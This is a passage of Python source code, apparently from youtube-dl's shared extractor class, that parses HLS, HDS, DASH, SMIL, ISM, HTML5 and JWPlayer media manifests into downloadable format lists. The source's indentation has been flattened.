media_url = media_el.attrib.get('href')
if media_url is None:
media_url = media_el.attrib.get('url')
if not media_url:
continue
manifest_url = (
media_url if media_url.startswith('http://') or media_url.startswith('https://')
else ((base_url or '/'.join(manifest_url.split('/')[:-1])) + '/' + media_url))
# If media_url is itself a f4m manifest do the recursive extraction
# since bitrates in parent manifest (this one) and media_url manifest
# may differ leading to inability to resolve the format by requested
# bitrate in f4m downloader
ext = determine_ext(manifest_url)
if ext == 'f4m':
f4m_formats = self._extract_f4m_formats(
manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal)
# Sometimes stream-level manifest contains single media entry that
# does not contain any quality metadata (e.g. http://matchtv.ru/#live-player).
# At the same time parent's media entry in set-level manifest may
# contain it. We will copy it from parent in such cases.
if len(f4m_formats) == 1:
f = f4m_formats[0]
f.update({
'tbr': f.get('tbr') or tbr,
'width': f.get('width') or width,
'height': f.get('height') or height,
'format_id': f.get('format_id') if not tbr else format_id,
'vcodec': vcodec,
})
formats.extend(f4m_formats)
continue
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', preference=preference,
m3u8_id=m3u8_id, fatal=fatal))
continue
formats.append({
'format_id': format_id,
'url': manifest_url,
'manifest_url': manifest_url,
'ext': 'flv' if bootstrap_info is not None else None,
'tbr': tbr,
'width': width,
'height': height,
'vcodec': vcodec,
'preference': preference,
})
return formats
def _m3u8_meta_format(self, m3u8_url, ext=None, preference=None, m3u8_id=None):
return {
'format_id': '-'.join(filter(None, [m3u8_id, 'meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': preference - 100 if preference else -100,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None, note=None, errnote=None,
fatal=True, live=False):
res = self._download_webpage_handle(
m3u8_url, video_id,
note=note or 'Downloading m3u8 information',
errnote=errnote or 'Failed to download m3u8 information',
fatal=fatal)
if res is False:
return []
m3u8_doc, urlh = res
m3u8_url = urlh.geturl()
if '#EXT-X-FAXS-CM:' in m3u8_doc: # Adobe Flash Access
return []
formats = [self._m3u8_meta_format(m3u8_url, ext, preference, m3u8_id)]
format_url = lambda u: (
u
if re.match(r'^https?://', u)
else compat_urlparse.urljoin(m3u8_url, u))
# We should try extracting formats only from master playlists [1], i.e.
# playlists that describe available qualities. On the other hand media
# playlists [2] should be returned as is since they contain just the media
# without qualities renditions.
# Fortunately, master playlist can be easily distinguished from media
# playlist based on particular tags availability. As of [1, 2] master
# playlist tags MUST NOT appear in a media playist and vice versa.
# As of [3] #EXT-X-TARGETDURATION tag is REQUIRED for every media playlist
# and MUST NOT appear in master playlist thus we can clearly detect media
# playlist with this criterion.
# 1. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.4
# 2. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.3
# 3. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.3.1
if '#EXT-X-TARGETDURATION' in m3u8_doc: # media playlist, return as is
return [{
'url': m3u8_url,
'format_id': m3u8_id,
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}]
audio_in_video_stream = {}
last_info = {}
last_media = {}
for line in m3u8_doc.splitlines():
if line.startswith('#EXT-X-STREAM-INF:'):
last_info = parse_m3u8_attributes(line)
elif line.startswith('#EXT-X-MEDIA:'):
media = parse_m3u8_attributes(line)
media_type = media.get('TYPE')
if media_type in ('VIDEO', 'AUDIO'):
group_id = media.get('GROUP-ID')
media_url = media.get('URI')
if media_url:
format_id = []
for v in (group_id, media.get('NAME')):
if v:
format_id.append(v)
f = {
'format_id': '-'.join(format_id),
'url': format_url(media_url),
'language': media.get('LANGUAGE'),
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}
if media_type == 'AUDIO':
f['vcodec'] = 'none'
if group_id and not audio_in_video_stream.get(group_id):
audio_in_video_stream[group_id] = False
formats.append(f)
else:
# When there is no URI in EXT-X-MEDIA let this tag's
# data be used by regular URI lines below
last_media = media
if media_type == 'AUDIO' and group_id:
audio_in_video_stream[group_id] = True
elif line.startswith('#') or not line.strip():
continue
else:
tbr = int_or_none(last_info.get('AVERAGE-BANDWIDTH') or last_info.get('BANDWIDTH'), scale=1000)
format_id = []
if m3u8_id:
format_id.append(m3u8_id)
# Despite specification does not mention NAME attribute for
# EXT-X-STREAM-INF it still sometimes may be present
stream_name = last_info.get('NAME') or last_media.get('NAME')
# Bandwidth of live streams may differ over time thus making
# format_id unpredictable. So it's better to keep provided
# format_id intact.
if not live:
format_id.append(stream_name if stream_name else '%d' % (tbr if tbr else len(formats)))
manifest_url = format_url(line.strip())
f = {
'format_id': '-'.join(format_id),
'url': manifest_url,
'manifest_url': manifest_url,
'tbr': tbr,
'ext': ext,
'fps': float_or_none(last_info.get('FRAME-RATE')),
'protocol': entry_protocol,
'preference': preference,
}
resolution = last_info.get('RESOLUTION')
if resolution:
mobj = re.search(r'(?P<width>\d+)[xX](?P<height>\d+)', resolution)
if mobj:
f['width'] = int(mobj.group('width'))
f['height'] = int(mobj.group('height'))
# Unified Streaming Platform
mobj = re.search(
r'audio.*?(?:%3D|=)(\d+)(?:-video.*?(?:%3D|=)(\d+))?', f['url'])
if mobj:
abr, vbr = mobj.groups()
abr, vbr = float_or_none(abr, 1000), float_or_none(vbr, 1000)
f.update({
'vbr': vbr,
'abr': abr,
})
f.update(parse_codecs(last_info.get('CODECS')))
if audio_in_video_stream.get(last_info.get('AUDIO')) is False and f['vcodec'] != 'none':
# TODO: update acodec for audio only formats with the same GROUP-ID
f['acodec'] = 'none'
formats.append(f)
last_info = {}
last_media = {}
return formats
@staticmethod
def _xpath_ns(path, namespace=None):
if not namespace:
return path
out = []
for c in path.split('/'):
if not c or c == '.':
out.append(c)
else:
out.append('{%s}%s' % (namespace, c))
return '/'.join(out)
def _extract_smil_formats(self, smil_url, video_id, fatal=True, f4m_params=None, transform_source=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal, transform_source=transform_source)
if smil is False:
assert not fatal
return []
namespace = self._parse_smil_namespace(smil)
return self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
def _extract_smil_info(self, smil_url, video_id, fatal=True, f4m_params=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal)
if smil is False:
return {}
return self._parse_smil(smil, smil_url, video_id, f4m_params=f4m_params)
def _download_smil(self, smil_url, video_id, fatal=True, transform_source=None):
return self._download_xml(
smil_url, video_id, 'Downloading SMIL file',
'Unable to download SMIL file', fatal=fatal, transform_source=transform_source)
def _parse_smil(self, smil, smil_url, video_id, f4m_params=None):
namespace = self._parse_smil_namespace(smil)
formats = self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
subtitles = self._parse_smil_subtitles(smil, namespace=namespace)
video_id = os.path.splitext(url_basename(smil_url))[0]
title = None
description = None
upload_date = None
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
name = meta.attrib.get('name')
content = meta.attrib.get('content')
if not name or not content:
continue
if not title and name == 'title':
title = content
elif not description and name in ('description', 'abstract'):
description = content
elif not upload_date and name == 'date':
upload_date = unified_strdate(content)
thumbnails = [{
'id': image.get('type'),
'url': image.get('src'),
'width': int_or_none(image.get('width')),
'height': int_or_none(image.get('height')),
} for image in smil.findall(self._xpath_ns('.//image', namespace)) if image.get('src')]
return {
'id': video_id,
'title': title or video_id,
'description': description,
'upload_date': upload_date,
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
def _parse_smil_namespace(self, smil):
return self._search_regex(
r'(?i)^{([^}]+)?}smil$', smil.tag, 'namespace', default=None)
def _parse_smil_formats(self, smil, smil_url, video_id, namespace=None, f4m_params=None, transform_rtmp_url=None):
base = smil_url
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
b = meta.get('base') or meta.get('httpBase')
if b:
base = b
break
formats = []
rtmp_count = 0
http_count = 0
m3u8_count = 0
srcs = []
media = smil.findall(self._xpath_ns('.//video', namespace)) + smil.findall(self._xpath_ns('.//audio', namespace))
for medium in media:
src = medium.get('src')
if not src or src in srcs:
continue
srcs.append(src)
bitrate = float_or_none(medium.get('system-bitrate') or medium.get('systemBitrate'), 1000)
filesize = int_or_none(medium.get('size') or medium.get('fileSize'))
width = int_or_none(medium.get('width'))
height = int_or_none(medium.get('height'))
proto = medium.get('proto')
ext = medium.get('ext')
src_ext = determine_ext(src)
streamer = medium.get('streamer') or base
if proto == 'rtmp' or streamer.startswith('rtmp'):
rtmp_count += 1
formats.append({
'url': streamer,
'play_path': src,
'ext': 'flv',
'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
if transform_rtmp_url:
streamer, src = transform_rtmp_url(streamer, src)
formats[-1].update({
'url': streamer,
'play_path': src,
})
continue
src_url = src if src.startswith('http') else compat_urlparse.urljoin(base, src)
src_url = src_url.strip()
if proto == 'm3u8' or src_ext == 'm3u8':
m3u8_formats = self._extract_m3u8_formats(
src_url, video_id, ext or 'mp4', m3u8_id='hls', fatal=False)
if len(m3u8_formats) == 1:
m3u8_count += 1
m3u8_formats[0].update({
'format_id': 'hls-%d' % (m3u8_count if bitrate is None else bitrate),
'tbr': bitrate,
'width': width,
'height': height,
})
formats.extend(m3u8_formats)
continue
if src_ext == 'f4m':
f4m_url = src_url
if not f4m_params:
f4m_params = {
'hdcore': '3.2.0',
'plugin': 'flowplayer-3.2.0.1',
}
f4m_url += '&' if '?' in f4m_url else '?'
f4m_url += compat_urllib_parse_urlencode(f4m_params)
formats.extend(self._extract_f4m_formats(f4m_url, video_id, f4m_id='hds', fatal=False))
continue
if src_url.startswith('http') and self._is_valid_url(src, video_id):
http_count += 1
formats.append({
'url': src_url,
'ext': ext or src_ext or 'flv',
'format_id': 'http-%d' % (bitrate or http_count),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
continue
return formats
def _parse_smil_subtitles(self, smil, namespace=None, subtitles_lang='en'):
urls = []
subtitles = {}
for num, textstream in enumerate(smil.findall(self._xpath_ns('.//textstream', namespace))):
src = textstream.get('src')
if not src or src in urls:
continue
urls.append(src)
ext = textstream.get('ext') or mimetype2ext(textstream.get('type')) or determine_ext(src)
lang = textstream.get('systemLanguage') or textstream.get('systemLanguageName') or textstream.get('lang') or subtitles_lang
subtitles.setdefault(lang, []).append({
'url': src,
'ext': ext,
})
return subtitles
def _extract_xspf_playlist(self, playlist_url, playlist_id, fatal=True):
xspf = self._download_xml(
playlist_url, playlist_id, 'Downloading xpsf playlist',
'Unable to download xspf manifest', fatal=fatal)
if xspf is False:
return []
return self._parse_xspf(xspf, playlist_id)
def _parse_xspf(self, playlist, playlist_id):
NS_MAP = {
'xspf': 'http://xspf.org/ns/0/',
's1': 'http://static.streamone.nl/player/ns/0',
}
entries = []
for track in playlist.findall(xpath_with_ns('./xspf:trackList/xspf:track', NS_MAP)):
title = xpath_text(
track, xpath_with_ns('./xspf:title', NS_MAP), 'title', default=playlist_id)
description = xpath_text(
track, xpath_with_ns('./xspf:annotation', NS_MAP), 'description')
thumbnail = xpath_text(
track, xpath_with_ns('./xspf:image', NS_MAP), 'thumbnail')
duration = float_or_none(
xpath_text(track, xpath_with_ns('./xspf:duration', NS_MAP), 'duration'), 1000)
formats = [{
'url': location.text,
'format_id': location.get(xpath_with_ns('s1:label', NS_MAP)),
'width': int_or_none(location.get(xpath_with_ns('s1:width', NS_MAP))),
'height': int_or_none(location.get(xpath_with_ns('s1:height', NS_MAP))),
} for location in track.findall(xpath_with_ns('./xspf:location', NS_MAP))]
self._sort_formats(formats)
entries.append({
'id': playlist_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'formats': formats,
})
return entries
def _extract_mpd_formats(self, mpd_url, video_id, mpd_id=None, note=None, errnote=None, fatal=True, formats_dict={}):
res = self._download_webpage_handle(
mpd_url, video_id,
note=note or 'Downloading MPD manifest',
errnote=errnote or 'Failed to download MPD manifest',
fatal=fatal)
if res is False:
return []
mpd, urlh = res
mpd_base_url = base_url(urlh.geturl())
return self._parse_mpd_formats(
compat_etree_fromstring(mpd.encode('utf-8')), mpd_id, mpd_base_url,
formats_dict=formats_dict, mpd_url=mpd_url)
def _parse_mpd_formats(self, mpd_doc, mpd_id=None, mpd_base_url='', formats_dict={}, mpd_url=None):
"""
Parse formats from MPD manifest.
References:
1. MPEG-DASH Standard, ISO/IEC 23009-1:2014(E),
http://standards.iso.org/ittf/PubliclyAvailableStandards/c065274_ISO_IEC_23009-1_2014.zip
2. https://en.wikipedia.org/wiki/Dynamic_Adaptive_Streaming_over_HTTP
"""
if mpd_doc.get('type') == 'dynamic':
return []
namespace = self._search_regex(r'(?i)^{([^}]+)?}MPD$', mpd_doc.tag, 'namespace', default=None)
def _add_ns(path):
return self._xpath_ns(path, namespace)
def is_drm_protected(element):
return element.find(_add_ns('ContentProtection')) is not None
def extract_multisegment_info(element, ms_parent_info):
ms_info = ms_parent_info.copy()
# As per [1, 5.3.9.2.2] SegmentList and SegmentTemplate share some
# common attributes and elements. We will only extract relevant
# for us.
def extract_common(source):
segment_timeline = source.find(_add_ns('SegmentTimeline'))
if segment_timeline is not None:
s_e = segment_timeline.findall(_add_ns('S'))
if s_e:
ms_info['total_number'] = 0
ms_info['s'] = []
for s in s_e:
r = int(s.get('r', 0))
ms_info['total_number'] += 1 + r
ms_info['s'].append({
't': int(s.get('t', 0)),
# @d is mandatory (see [1, 5.3.9.6.2, Table 17, page 60])
'd': int(s.attrib['d']),
'r': r,
})
start_number = source.get('startNumber')
if start_number:
ms_info['start_number'] = int(start_number)
timescale = source.get('timescale')
if timescale:
ms_info['timescale'] = int(timescale)
segment_duration = source.get('duration')
if segment_duration:
ms_info['segment_duration'] = int(segment_duration)
def extract_Initialization(source):
initialization = source.find(_add_ns('Initialization'))
if initialization is not None:
ms_info['initialization_url'] = initialization.attrib['sourceURL']
segment_list = element.find(_add_ns('SegmentList'))
if segment_list is not None:
extract_common(segment_list)
extract_Initialization(segment_list)
segment_urls_e = segment_list.findall(_add_ns('SegmentURL'))
if segment_urls_e:
ms_info['segment_urls'] = [segment.attrib['media'] for segment in segment_urls_e]
else:
segment_template = element.find(_add_ns('SegmentTemplate'))
if segment_template is not None:
extract_common(segment_template)
media = segment_template.get('media')
if media:
ms_info['media'] = media
initialization = segment_template.get('initialization')
if initialization:
ms_info['initialization'] = initialization
else:
extract_Initialization(segment_template)
return ms_info
mpd_duration = parse_duration(mpd_doc.get('mediaPresentationDuration'))
formats = []
for period in mpd_doc.findall(_add_ns('Period')):
period_duration = parse_duration(period.get('duration')) or mpd_duration
period_ms_info = extract_multisegment_info(period, {
'start_number': 1,
'timescale': 1,
})
for adaptation_set in period.findall(_add_ns('AdaptationSet')):
if is_drm_protected(adaptation_set):
continue
adaption_set_ms_info = extract_multisegment_info(adaptation_set, period_ms_info)
for representation in adaptation_set.findall(_add_ns('Representation')):
if is_drm_protected(representation):
continue
representation_attrib = adaptation_set.attrib.copy()
representation_attrib.update(representation.attrib)
# According to [1, 5.3.7.2, Table 9, page 41], @mimeType is mandatory
mime_type = representation_attrib['mimeType']
content_type = mime_type.split('/')[0]
if content_type == 'text':
# TODO implement WebVTT downloading
pass
elif content_type == 'video' or content_type == 'audio':
base_url = ''
for element in (representation, adaptation_set, period, mpd_doc):
base_url_e = element.find(_add_ns('BaseURL'))
if base_url_e is not None:
base_url = base_url_e.text + base_url
if re.match(r'^https?://', base_url):
break
if mpd_base_url and not re.match(r'^https?://', base_url):
if not mpd_base_url.endswith('/') and not base_url.startswith('/'):
mpd_base_url += '/'
base_url = mpd_base_url + base_url
representation_id = representation_attrib.get('id')
lang = representation_attrib.get('lang')
url_el = representation.find(_add_ns('BaseURL'))
filesize = int_or_none(url_el.attrib.get('{http://youtube.com/yt/2012/10/10}contentLength') if url_el is not None else None)
bandwidth = int_or_none(representation_attrib.get('bandwidth'))
f = {
'format_id': '%s-%s' % (mpd_id, representation_id) if mpd_id else representation_id,
'url': base_url,
'manifest_url': mpd_url,
'ext': mimetype2ext(mime_type),
'width': int_or_none(representation_attrib.get('width')),
'height': int_or_none(representation_attrib.get('height')),
'tbr': int_or_none(bandwidth, 1000),
'asr': int_or_none(representation_attrib.get('audioSamplingRate')),
'fps': int_or_none(representation_attrib.get('frameRate')),
'language': lang if lang not in ('mul', 'und', 'zxx', 'mis') else None,
'format_note': 'DASH %s' % content_type,
'filesize': filesize,
}
f.update(parse_codecs(representation_attrib.get('codecs')))
representation_ms_info = extract_multisegment_info(representation, adaption_set_ms_info)
def prepare_template(template_name, identifiers):
t = representation_ms_info[template_name]
t = t.replace('$RepresentationID$', representation_id)
t = re.sub(r'\$(%s)\$' % '|'.join(identifiers), r'%(\1)d', t)
t = re.sub(r'\$(%s)%%([^$]+)\$' % '|'.join(identifiers), r'%(\1)\2', t)
t.replace('$$', '$')
return t
# @initialization is a regular template like @media one
# so it should be handled just the same way (see
# https://github.com/rg3/youtube-dl/issues/11605)
if 'initialization' in representation_ms_info:
initialization_template = prepare_template(
'initialization',
# As per [1, 5.3.9.4.2, Table 15, page 54] $Number$ and
# $Time$ shall not be included for @initialization thus
# only $Bandwidth$ remains
('Bandwidth', ))
representation_ms_info['initialization_url'] = initialization_template % {
'Bandwidth': bandwidth,
}
if 'segment_urls' not in representation_ms_info and 'media' in representation_ms_info:
media_template = prepare_template('media', ('Number', 'Bandwidth', 'Time'))
# As per [1, 5.3.9.4.4, Table 16, page 55] $Number$ and $Time$
# can't be used at the same time
if '%(Number' in media_template and 's' not in representation_ms_info:
segment_duration = None
if 'total_number' not in representation_ms_info and 'segment_duration':
segment_duration = float_or_none(representation_ms_info['segment_duration'], representation_ms_info['timescale'])
representation_ms_info['total_number'] = int(math.ceil(float(period_duration) / segment_duration))
representation_ms_info['fragments'] = [{
'url': media_template % {
'Number': segment_number,
'Bandwidth': bandwidth,
},
'duration': segment_duration,
} for segment_number in range(
representation_ms_info['start_number'],
representation_ms_info['total_number'] + representation_ms_info['start_number'])]
else:
# $Number*$ or $Time$ in media template with S list available
# Example $Number*$: http://www.svtplay.se/klipp/9023742/stopptid-om-bjorn-borg
# Example $Time$: https://play.arkena.com/embed/avp/v2/player/media/b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe/1/129411
representation_ms_info['fragments'] = []
segment_time = 0
segment_d = None
segment_number = representation_ms_info['start_number']
def add_segment_url():
segment_url = media_template % {
'Time': segment_time,
'Bandwidth': bandwidth,
'Number': segment_number,
}
representation_ms_info['fragments'].append({
'url': segment_url,
'duration': float_or_none(segment_d, representation_ms_info['timescale']),
})
for num, s in enumerate(representation_ms_info['s']):
segment_time = s.get('t') or segment_time
segment_d = s['d']
add_segment_url()
segment_number += 1
for r in range(s.get('r', 0)):
segment_time += segment_d
add_segment_url()
segment_number += 1
segment_time += segment_d
elif 'segment_urls' in representation_ms_info and 's' in representation_ms_info:
# No media template
# Example: https://www.youtube.com/watch?v=iXZV5uAYMJI
# or any YouTube dashsegments video
fragments = []
segment_index = 0
timescale = representation_ms_info['timescale']
for s in representation_ms_info['s']:
duration = float_or_none(s['d'], timescale)
for r in range(s.get('r', 0) + 1):
fragments.append({
'url': representation_ms_info['segment_urls'][segment_index],
'duration': duration,
})
segment_index += 1
representation_ms_info['fragments'] = fragments
# NB: MPD manifest may contain direct URLs to unfragmented media.
# No fragments key is present in this case.
if 'fragments' in representation_ms_info:
f.update({
'fragments': [],
'protocol': 'http_dash_segments',
})
if 'initialization_url' in representation_ms_info:
initialization_url = representation_ms_info['initialization_url']
if not f.get('url'):
f['url'] = initialization_url
f['fragments'].append({'url': initialization_url})
f['fragments'].extend(representation_ms_info['fragments'])
for fragment in f['fragments']:
fragment['url'] = urljoin(base_url, fragment['url'])
try:
existing_format = next(
fo for fo in formats
if fo['format_id'] == representation_id)
except StopIteration:
full_info = formats_dict.get(representation_id, {}).copy()
full_info.update(f)
formats.append(full_info)
else:
existing_format.update(f)
else:
self.report_warning('Unknown MIME type %s in DASH manifest' % mime_type)
return formats
def _extract_ism_formats(self, ism_url, video_id, ism_id=None, note=None, errnote=None, fatal=True):
res = self._download_webpage_handle(
ism_url, video_id,
note=note or 'Downloading ISM manifest',
errnote=errnote or 'Failed to download ISM manifest',
fatal=fatal)
if res is False:
return []
ism, urlh = res
return self._parse_ism_formats(
compat_etree_fromstring(ism.encode('utf-8')), urlh.geturl(), ism_id)
def _parse_ism_formats(self, ism_doc, ism_url, ism_id=None):
if ism_doc.get('IsLive') == 'TRUE' or ism_doc.find('Protection') is not None:
return []
duration = int(ism_doc.attrib['Duration'])
timescale = int_or_none(ism_doc.get('TimeScale')) or 10000000
formats = []
for stream in ism_doc.findall('StreamIndex'):
stream_type = stream.get('Type')
if stream_type not in ('video', 'audio'):
continue
url_pattern = stream.attrib['Url']
stream_timescale = int_or_none(stream.get('TimeScale')) or timescale
stream_name = stream.get('Name')
for track in stream.findall('QualityLevel'):
fourcc = track.get('FourCC')
# TODO: add support for WVC1 and WMAP
if fourcc not in ('H264', 'AVC1', 'AACL'):
self.report_warning('%s is not a supported codec' % fourcc)
continue
tbr = int(track.attrib['Bitrate']) // 1000
width = int_or_none(track.get('MaxWidth'))
height = int_or_none(track.get('MaxHeight'))
sampling_rate = int_or_none(track.get('SamplingRate'))
track_url_pattern = re.sub(r'{[Bb]itrate}', track.attrib['Bitrate'], url_pattern)
track_url_pattern = compat_urlparse.urljoin(ism_url, track_url_pattern)
fragments = []
fragment_ctx = {
'time': 0,
}
stream_fragments = stream.findall('c')
for stream_fragment_index, stream_fragment in enumerate(stream_fragments):
fragment_ctx['time'] = int_or_none(stream_fragment.get('t')) or fragment_ctx['time']
fragment_repeat = int_or_none(stream_fragment.get('r')) or 1
fragment_ctx['duration'] = int_or_none(stream_fragment.get('d'))
if not fragment_ctx['duration']:
try:
next_fragment_time = int(stream_fragment[stream_fragment_index + 1].attrib['t'])
except IndexError:
next_fragment_time = duration
fragment_ctx['duration'] = (next_fragment_time - fragment_ctx['time']) / fragment_repeat
for _ in range(fragment_repeat):
fragments.append({
'url': re.sub(r'{start[ _]time}', compat_str(fragment_ctx['time']), track_url_pattern),
'duration': fragment_ctx['duration'] / stream_timescale,
})
fragment_ctx['time'] += fragment_ctx['duration']
format_id = []
if ism_id:
format_id.append(ism_id)
if stream_name:
format_id.append(stream_name)
format_id.append(compat_str(tbr))
formats.append({
'format_id': '-'.join(format_id),
'url': ism_url,
'manifest_url': ism_url,
'ext': 'ismv' if stream_type == 'video' else 'isma',
'width': width,
'height': height,
'tbr': tbr,
'asr': sampling_rate,
'vcodec': 'none' if stream_type == 'audio' else fourcc,
'acodec': 'none' if stream_type == 'video' else fourcc,
'protocol': 'ism',
'fragments': fragments,
'_download_params': {
'duration': duration,
'timescale': stream_timescale,
'width': width or 0,
'height': height or 0,
'fourcc': fourcc,
'codec_private_data': track.get('CodecPrivateData'),
'sampling_rate': sampling_rate,
'channels': int_or_none(track.get('Channels', 2)),
'bits_per_sample': int_or_none(track.get('BitsPerSample', 16)),
'nal_unit_length_field': int_or_none(track.get('NALUnitLengthField', 4)),
},
})
return formats
def _parse_html5_media_entries(self, base_url, webpage, video_id, m3u8_id=None, m3u8_entry_protocol='m3u8', mpd_id=None, preference=None):
def absolute_url(video_url):
return compat_urlparse.urljoin(base_url, video_url)
def parse_content_type(content_type):
if not content_type:
return {}
ctr = re.search(r'(?P<mimetype>[^/]+/[^;]+)(?:;\s*codecs="?(?P<codecs>[^"]+))?', content_type)
if ctr:
mimetype, codecs = ctr.groups()
f = parse_codecs(codecs)
f['ext'] = mimetype2ext(mimetype)
return f
return {}
def _media_formats(src, cur_media_type):
full_url = absolute_url(src)
ext = determine_ext(full_url)
if ext == 'm3u8':
is_plain_url = False
formats = self._extract_m3u8_formats(
full_url, video_id, ext='mp4',
entry_protocol=m3u8_entry_protocol, m3u8_id=m3u8_id,
preference=preference)
elif ext == 'mpd':
is_plain_url = False
formats = self._extract_mpd_formats(
full_url, video_id, mpd_id=mpd_id)
else:
is_plain_url = True
formats = [{
'url': full_url,
'vcodec': 'none' if cur_media_type == 'audio' else None,
}]
return is_plain_url, formats
entries = []
media_tags = [(media_tag, media_type, '')
for media_tag, media_type
in re.findall(r'(?s)(<(video|audio)[^>]*/>)', webpage)]
media_tags.extend(re.findall(
# We only allow video|audio followed by a whitespace or '>'.
# Allowing more characters may end up in significant slow down (see
# https://github.com/rg3/youtube-dl/issues/11979, example URL:
# http://www.porntrex.com/maps/videositemap.xml).
r'(?s)(<(?P<tag>video|audio)(?:\s+[^>]*)?>)(.*?)</(?P=tag)>', webpage))
for media_tag, media_type, media_content in media_tags:
media_info = {
'formats': [],
'subtitles': {},
}
media_attributes = extract_attributes(media_tag)
src = media_attributes.get('src')
if src:
_, formats = _media_formats(src, media_type)
media_info['formats'].extend(formats)
media_info['thumbnail'] = media_attributes.get('poster')
if media_content:
for source_tag in re.findall(r'<source[^>]+>', media_content):
source_attributes = extract_attributes(source_tag)
src = source_attributes.get('src')
if not src:
continue
is_plain_url, formats = _media_formats(src, media_type)
if is_plain_url:
f = parse_content_type(source_attributes.get('type'))
f.update(formats[0])
media_info['formats'].append(f)
else:
media_info['formats'].extend(formats)
for track_tag in re.findall(r'<track[^>]+>', media_content):
track_attributes = extract_attributes(track_tag)
kind = track_attributes.get('kind')
if not kind or kind in ('subtitles', 'captions'):
src = track_attributes.get('src')
if not src:
continue
lang = track_attributes.get('srclang') or track_attributes.get('lang') or track_attributes.get('label')
media_info['subtitles'].setdefault(lang, []).append({
'url': absolute_url(src),
})
if media_info['formats'] or media_info['subtitles']:
entries.append(media_info)
return entries
def _extract_akamai_formats(self, manifest_url, video_id, hosts={}):
formats = []
hdcore_sign = 'hdcore=3.7.0'
f4m_url = re.sub(r'(https?://[^/+])/i/', r'\1/z/', manifest_url).replace('/master.m3u8', '/manifest.f4m')
hds_host = hosts.get('hds')
if hds_host:
f4m_url = re.sub(r'(https?://)[^/]+', r'\1' + hds_host, f4m_url)
if 'hdcore=' not in f4m_url:
f4m_url += ('&' if '?' in f4m_url else '?') + hdcore_sign
f4m_formats = self._extract_f4m_formats(
f4m_url, video_id, f4m_id='hds', fatal=False)
for entry in f4m_formats:
entry.update({'extra_param_to_segment_url': hdcore_sign})
formats.extend(f4m_formats)
m3u8_url = re.sub(r'(https?://[^/]+)/z/', r'\1/i/', manifest_url).replace('/manifest.f4m', '/master.m3u8')
hls_host = hosts.get('hls')
if hls_host:
m3u8_url = re.sub(r'(https?://)[^/]+', r'\1' + hls_host, m3u8_url)
formats.extend(self._extract_m3u8_formats(
m3u8_url, video_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
return formats
def _extract_wowza_formats(self, url, video_id, m3u8_entry_protocol='m3u8_native', skip_protocols=[]):
url = re.sub(r'/(?:manifest|playlist|jwplayer)\.(?:m3u8|f4m|mpd|smil)', '', url)
url_base = self._search_regex(r'(?:https?|rtmp|rtsp)(://[^?]+)', url, 'format url')
http_base_url = 'http' + url_base
formats = []
if 'm3u8' not in skip_protocols:
formats.extend(self._extract_m3u8_formats(
http_base_url + '/playlist.m3u8', video_id, 'mp4',
m3u8_entry_protocol, m3u8_id='hls', fatal=False))
if 'f4m' not in skip_protocols:
formats.extend(self._extract_f4m_formats(
http_base_url + '/manifest.f4m',
video_id, f4m_id='hds', fatal=False))
if 'dash' not in skip_protocols:
formats.extend(self._extract_mpd_formats(
http_base_url + '/manifest.mpd',
video_id, mpd_id='dash', fatal=False))
if re.search(r'(?:/smil:|\.smil)', url_base):
if 'smil' not in skip_protocols:
rtmp_formats = self._extract_smil_formats(
http_base_url + '/jwplayer.smil',
video_id, fatal=False)
for rtmp_format in rtmp_formats:
rtsp_format = rtmp_format.copy()
rtsp_format['url'] = '%s/%s' % (rtmp_format['url'], rtmp_format['play_path'])
del rtsp_format['play_path']
del rtsp_format['ext']
rtsp_format.update({
'url': rtsp_format['url'].replace('rtmp://', 'rtsp://'),
'format_id': rtmp_format['format_id'].replace('rtmp', 'rtsp'),
'protocol': 'rtsp',
})
formats.extend([rtmp_format, rtsp_format])
else:
for protocol in ('rtmp', 'rtsp'):
if protocol not in skip_protocols:
formats.append({
'url': protocol + url_base,
'format_id': protocol,
'protocol': protocol,
})
return formats
@staticmethod
def _find_jwplayer_data(webpage):
mobj = re.search(
r'jwplayer\((?P<quote>[\'"])[^\'" ]+(?P=quote)\)\.setup\s*\((?P<options>[^)]+)\)',
webpage)
if mobj:
return mobj.group('options')
def _extract_jwplayer_data(self, webpage, video_id, *args, **kwargs):
jwplayer_data = self._parse_json(
self._find_jwplayer_data(webpage), video_id,
transform_source=js_to_json)
return self._parse_jwplayer_data(
jwplayer_data, video_id, *args, **kwargs)
def _parse_jwplayer_data(self, jwplayer_data, video_id=None, require_title=True,
m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
# JWPlayer backward compatibility: flattened playlists
# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/api/config.js#L81-L96
if 'playlist' not in jwplayer_data:
jwplayer_data = {'playlist': [jwplayer_data]}
entries = []
# JWPlayer backward compatibility: single playlist item
# https://github.com/jwplayer/jwplayer/blob/v7.7.0/src/js/playlist/playlist.js#L10
if not isinstance(jwplayer_data['playlist'], list):
jwplayer_data['playlist'] = [jwplayer_data['playlist']]
for video_data in jwplayer_data['playlist']:
# JWPlayer backward compatibility: flattened sources
